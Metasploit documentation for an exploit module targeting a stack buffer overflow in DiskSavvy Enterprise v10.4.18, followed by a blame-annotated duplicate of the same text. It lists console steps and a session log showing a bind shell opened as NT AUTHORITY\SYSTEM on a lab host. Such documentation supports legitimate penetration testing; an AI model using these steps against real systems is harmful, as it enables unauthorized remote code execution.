documentation/modules/exploit/windows/misc/disk_savvy_adm.md

## Vulnerable Application

[DiskSavvy Enterprise](http://www.disksavvy.com/) version v10.4.18, affected by a stack-based buffer overflow vulnerability caused by improper bounds checking of the request sent to the built-in server which can be leveraged by an attacker to execute arbitrary code in the context of NT AUTHORITY\SYSTEM on the target.. This module has been tested successfully on Windows 7 SP1 x86. The vulnerable application is available for download at [DiskSavvy Enterprise](http://www.disksavvy.com/setups/disksavvyent_setup_v10.4.18.exe).

## Verification Steps
  1. Install a vulnerable DiskSavvy Enterprise
  2. Start `msfconsole`
  3. Do `use exploit/windows/misc/disk_savvy_adm`
  4. Do `set RHOST ip`
  5. Do `set PAYLOAD windows/shell/bind_tcp`
  6. Do `exploit`
  7. Enjoy your shell

## Scenarios

### DiskSavvy Enterprise v10.4.18 on Windows 7 SP1 x86

```
msf > use exploit/windows/misc/disk_savvy_adm 
msf exploit(windows/misc/disk_savvy_adm) > set RHOST 192.168.216.55
RHOST => 192.168.216.55
msf exploit(windows/misc/disk_savvy_adm) > set payload windows/shell/bind_tcp
payload => windows/shell/bind_tcp
msf exploit(windows/misc/disk_savvy_adm) > exploit 

[*] Started bind handler
[*] Encoded stage with x86/shikata_ga_nai
[*] Sending encoded stage (267 bytes) to 192.168.216.55
[*] Command shell session 1 opened (192.168.216.5:36113 -> 192.168.216.55:4444) at 2018-02-14 15:19:02 -0500

Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

C:\Windows\system32>whoami      
whoami
nt authority\system

C:\Windows\system32>
```
Disk Savvy Server Buffer Overflow Documentation 2018-02-14 20:35:03 +00:00			`## Vulnerable Application`

			[DiskSavvy Enterprise](http://www.disksavvy.com/) version v10.4.18, affected by a stack-based buffer overflow vulnerability caused by improper bounds checking of the request sent to the built-in server which can be leveraged by an attacker to execute arbitrary code in the context of NT AUTHORITY\SYSTEM on the target.. This module has been tested successfully on Windows 7 SP1 x86. The vulnerable application is available for download at [DiskSavvy Enterprise](http://www.disksavvy.com/setups/disksavvyent_setup_v10.4.18.exe).

			`## Verification Steps`
Verification steps update 2018-02-14 20:40:32 +00:00			`1. Install a vulnerable DiskSavvy Enterprise`
			2. Start `msfconsole`
Update Documentation 2018-02-20 15:37:40 -06:00			3. Do `use exploit/windows/misc/disk_savvy_adm`
Verification steps update 2018-02-14 20:40:32 +00:00			4. Do `set RHOST ip`
			5. Do `set PAYLOAD windows/shell/bind_tcp`
			6. Do `exploit`
Update Documentation 2018-02-20 15:37:40 -06:00			`7. Enjoy your shell`
Disk Savvy Server Buffer Overflow Documentation 2018-02-14 20:35:03 +00:00
			`## Scenarios`

Update Documentation 2018-02-20 15:37:40 -06:00			`### DiskSavvy Enterprise v10.4.18 on Windows 7 SP1 x86`
Disk Savvy Server Buffer Overflow Documentation 2018-02-14 20:35:03 +00:00
			```
			`msf > use exploit/windows/misc/disk_savvy_adm`
			`msf exploit(windows/misc/disk_savvy_adm) > set RHOST 192.168.216.55`
			`RHOST => 192.168.216.55`
			`msf exploit(windows/misc/disk_savvy_adm) > set payload windows/shell/bind_tcp`
			`payload => windows/shell/bind_tcp`
			`msf exploit(windows/misc/disk_savvy_adm) > exploit`

			`[*] Started bind handler`
			`[*] Encoded stage with x86/shikata_ga_nai`
			`[*] Sending encoded stage (267 bytes) to 192.168.216.55`
			`[*] Command shell session 1 opened (192.168.216.5:36113 -> 192.168.216.55:4444) at 2018-02-14 15:19:02 -0500`

			`Microsoft Windows [Version 6.1.7601]`
			`Copyright (c) 2009 Microsoft Corporation. All rights reserved.`

			`C:\Windows\system32>whoami`
			`whoami`
			`nt authority\system`

			`C:\Windows\system32>`
			```